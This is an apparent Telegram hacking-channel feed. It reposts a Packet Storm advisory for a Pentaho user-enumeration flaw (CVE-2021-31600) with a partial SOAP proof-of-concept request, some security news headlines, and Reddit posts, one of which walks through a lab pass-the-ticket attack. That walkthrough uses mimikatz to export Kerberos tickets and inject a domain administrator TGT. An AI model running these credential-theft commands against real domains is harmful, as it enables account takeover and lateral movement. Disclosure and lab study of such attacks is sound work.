Hacking Articles Tips Tricks Videos Tutorials
466 subscribers
65.6K photos
15 videos
157 files
131K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Pentaho Business Analytics / Pentaho Business Server 9.1 User Enumeration

https://4.bp.blogspot.com/-dyIqvjR3K84/WWlvfXt5NkI/AAAAAAAAIQA/Fvmwfk3J4TgcxqdY3USv0_rN_ZW9VtW1ACLcBGAs/s1600/h85.png
Pentaho implements a series of web services using the SOAP protocol to allow scripting interaction with the backend server. HAWSEC identified that the services userRoleListService and ServiceAction exposed through the /pentaho/webservices/userRoleListService and /pentaho/ServiceAction?action=SecurityDetails endpoints are not enforcing sufficient access controls. Specifically, an authenticated user can list all application usernames present in the Jackrabbit Repository.

MD5 | 4473d7f48fb807803a782756210b0a90

Download
Product: Pentaho Business Analytics / Pentaho Business Server
Vendor / Manufacturer: Hitachi Vantara
Affected Version(s): <=
Vulnerability Type: Jackrabbit User Enumeration
Solution Status: Fix Released on public GitHub repository
Manufacturer Notification: 8th February 2021
Solution Date: Wont fix
Public Disclosure: 01 November 2021
CVE Reference: CVE-2021-31600
Author(s) of Advisory: Alberto Favero ( HawSec ) & Altion Malka

--- ### --- ### ---

Product Description:

Pentaho is business intelligence (BI) software that provides data
integration, OLAP services, reporting, information dashboards, data mining
and extract, transform, load (ETL) capabilities. Its headquarters are in
Orlando, Florida. Pentaho was acquired by Hitachi Data Systems in 2015 and
in 2017 became part of Hitachi Vantara.

( Source: https://en.wikipedia.org/wiki/Pentaho )

--- ### --- ### ---

Vulnerability Details:

Pentaho implements a series of web services using the SOAP protocol to
allow scripting interaction with the backend server. HAWSEC identified that
the services userRoleListService and ServiceAction exposed through the
"/pentaho/webservices/userRoleListService" and
"/pentaho/ServiceAction?action=SecurityDetails" endpoints are not enforcing
sufficient access controls. Specifically, an authenticated user can list
all application usernames present in the Jackrabbit Repository.

--- ### --- ### ---

Proof of Concept (PoC):

See Ginger ( https://github.com/HawSec/ginger )

or

--- ~~~ --- ~~~ ---
POST /pentaho/webservices/userRoleListService HTTP/1.1
Host: localhost:8080
Connection: close
Cookie: JSESSIONID=878BCFF82EC40D06F72D64172CAC98B4;
SOAPAction:
Content-Type: text/xml; charset=UTF-8
Content-Length: 244

xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:ws="http://ws.userrole.security.platform.pentaho.org/">



Source:packetstormsecurity.com

___________________________
@hacking_Attack
@Hacking_Video
Dark Reading: Attacks/Breaches
To Secure DevOps, Security Teams Must be Agile

The evolution of agile development and infrastructure-as-code has given security teams the tools they need to gain visibility, find vulnerabilities early, and continuously evaluate infrastructure.
Dark Reading: Attacks/Breaches
How InfoSec Should Use the Minimum Viable Secure Product Checklist

Google and Salesforce executives discuss the need for the newly released MVSP, how tech companies came together to work on it, and how organizations should use it.
A Konami Code for Vuln Chaining Combos

Automate finding relational vulnerabilities for a more accurate risk ratingContinue reading on Medium »
Read more...
A question about internal(network?) pentesting.
https://www.reddit.com/r/redteamsec/comments/qngvrk/a_question_about_internalnetwork_pentesting/

Hey everyone i wonder your thoughts about internal pentesting and platforms like hackthebox(not the prolabs, just the machines). First of all one might say that there isn't such a thing as internal pentesting, but what i mean is an assumed breach and assessment of the internal network. Is it possible to be not that good at htb and do an internal assessment? I dont like hacking the machines at htb, can only hack medium to hard boxes and during those times i mostly get bored after some time(not because machines are not challenging, quite the opposite, i get stuck). I am mostly interested in AD environment, coding injectors, c2 structures for easy tasks in different languages and analyze them in debuggers etc, in a home lab. For context: i dont work in IT, i am just a hobbiyst. Probably wont/can't switch to IT either. Just curious about your thoughts on platforms like htb. submitted by /u/throwforadvent (https://www.reddit.com/user/throwforadvent)
[link] (https://www.reddit.com/r/redteamsec/comments/qngvrk/a_question_about_internalnetwork_pentesting/) [comments] (https://www.reddit.com/r/redteamsec/comments/qngvrk/a_question_about_internalnetwork_pentesting/)

___________________________
@hacking_Attack
@Hacking_Video
Having issues performing PTT with Windows 2019DC using mimikatz
https://www.reddit.com/r/redteamsec/comments/qniix3/having_issues_performing_ptt_with_windows_2019dc/

Hello, So full disclaimer, I am DFIR guy with a little pentesting experience not a red teamer. Anyway I am trying to demo a PTT attack using mimikatz in a simple lab environment that consists of. DC1 - domain controller on windows server 2019 Win10-1 - Up to date windows 10 Win10-2 - Up to data windows 10 To demo I first logged into Win10-2 with the DA account, logged off and then logged on as a domain user with local admin rights to the box. Defender is disabled because I'm just trying to demo what PTT looks like. Anyway here is what happens When I first logon and do a klist everything looks normal. ``C:\Users\sylvester>klist Current LogonId is 0:0x604779 Cached Tickets: (2) #0> Client: sylvester @ LAZERKITTENS.LOCAL Server: krbtgt/LAZERKITTENS.LOCAL @ LAZERKITTENS.LOCAL KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96 Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize Start Time: 11/5/2021 11:10:00 (local) End Time: 11/5/2021 21:10:00 (local) Renew Time: 11/12/2021 11:10:00 (local) Session Key Type: AES-256-CTS-HMAC-SHA1-96 Cache Flags: 0x1 -> PRIMARY Kdc Called: DC1.LazerKittens.local #1> Client: sylvester @ LAZERKITTENS.LOCAL Server: LDAP/DC1.LazerKittens.local/LazerKittens.local @ LAZERKITTENS.LOCAL KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96 Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize Start Time: 11/5/2021 11:10:20 (local) End Time: 11/5/2021 21:10:00 (local) Renew Time: 11/12/2021 11:10:00 (local) Session Key Type: AES-256-CTS-HMAC-SHA1-96 Cache Flags: 0 Kdc Called: DC1.LazerKittens.local`` Then I go ahead and run mimikatz, get debug using privilege::debug and dump the tickets using sekurlsa::tickets /export mimikatz # privilege::debug Privilege '20' OK mimikatz # sekurlsa::tickets /export ---snip After I export the tickets I loaded the administrator accounts TGT ticket into memory using kerberos::ptt mimikatz # kerberos::ptt [0;21701a]-2-0-40e10000-Administrator@krbtgt-LAZERKITTENS.LOCAL.kirbi (mailto:-2-0-40e10000-Administrator@krbtgt-LAZERKITTENS.LOCAL.kirbi) File: '[0;21701a]-2-0-40e10000-Administrator@krbtgt-LAZERKITTENS.LOCAL.kirbi (mailto:-2-0-40e10000-Administrator@krbtgt-LAZERKITTENS.LOCAL.kirbi)': OK ###### go in to a command prompt by typing misc::cmd and klist again. As expected the administrator ticket is now in my kerberos cache. C:\Users\sylvester\Desktop\mimikatz_trunk\x64>klist Current LogonId is 0:0x604756 Cached Tickets: (1) #0> Client: Administrator @ LAZERKITTENS.LOCAL Server: krbtgt/LAZERKITTENS.LOCAL @ LAZERKITTENS.LOCAL KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96 Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize Start Time: 11/5/2021 10:09:39 (local) End Time: 11/5/2021 20:09:39 (local) Renew Time: 11/12/2021 10:09:39 (local) Session Key Type: Kerberos DES-CBC-CRC Cache Flags: 0x1 -> PRIMARY Kdc Called: So at this point I'm thinking cool, all I need to do now is access my DC is type in dir \DC1\c$. However, when I attempt that I get the following error message. C:\Users\sylvester\Desktop\mimikatz_trunk\x64>dir \dc1\c$ The system cannot contact a domain controller to service the authentication request. Please try again later. If I do a klist purge and try to access the dc again I get the expected access is denied. Thanks in advance for your help! submitted by /u/Mufassa810 (https://www.reddit.com/user/Mufassa810)
[link] (https://www.reddit.com/r/redteamsec/comments/qniix3/having_issues_performing_ptt_with_windows_2019dc/) [comments] (https://www.reddit.com/r/redteamsec/comments/qniix3/having_issues_performing_ptt_with_windows_2019dc/)

___________________________
@hacking_Attack
@Hacking_Video